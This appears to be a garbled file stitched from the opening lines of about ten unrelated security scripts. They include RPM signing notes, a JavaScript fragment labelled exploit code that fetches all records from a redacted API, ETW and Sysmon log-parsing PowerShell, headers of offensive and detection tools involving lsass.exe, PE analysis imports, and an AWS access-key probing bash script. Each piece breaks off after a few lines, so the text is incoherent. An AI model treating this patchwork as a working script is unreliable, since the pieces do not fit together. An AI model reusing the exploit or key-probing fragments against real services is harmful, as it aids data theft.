# How to sign your custom RPM package with GPG key
# Step: 1
# Generate gpg key pair (public key and private key)
#
# You will be prompted with a series of questions about encryption.
# Simply select the default values presented. You will also be asked
# to create a Real Name, Email Address and Comment (comment optional).
#
# If you get the following response:

// Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
    // Holds the records as a string
    var allrecords = data;
    // Converting response to JSON

logman start trace dotNetAssemblyTrace2 -p "Microsoft-Windows-DotNETRuntimeRundown" "LoaderRundownKeyword, StartRundownKeyword" win:Informational -o dotNetAssemblyTrace2.etl -ets
Start-Sleep -Seconds 5
logman stop dotNetAssemblyTrace2 -ets
$EnumeratedCLRRuntimes = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=187)]]'
$EnumeratedAppDomains = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=157)]]'
$EnumeratedAssemblies = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=155)]]'
$EnumeratedModules = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=153)]]'

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious PowerShell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
# Install bash on Win10
# sudo apt-get install python-pip
# sudo pip install --upgrade requests

package djb2
// For when you ever need to implement a dictionary hash function,
// that's good enough, simple and fast.
//
// WARNING:
// Not cryptographically secure!
//
// Source: https://en.wikipedia.org/wiki/DJB2
//

filter Get-PEFeature {
<#
.SYNOPSIS
Retrieves key features from PE files that can be used to build detections.
.DESCRIPTION
Get-PEFeature extracts key features of PE files that are relevant to building detections.

import os
import sys
import logging
import pefile
import ucutils
import unicorn
import capstone
import argparse

#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" # turn on debug
_timeout="20"
# You need a valid key, since the errors happen after it validates that the key exists. We do not need the secret key, only the access key.
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

# Author: Matthew Graeber (@mattifestation)
$Epoch = Get-Date '01/01/1970'
# Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/
$StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName
$TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone)
# Parse out all the LogonGUID fields for sysmon ProcessCreate events
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object {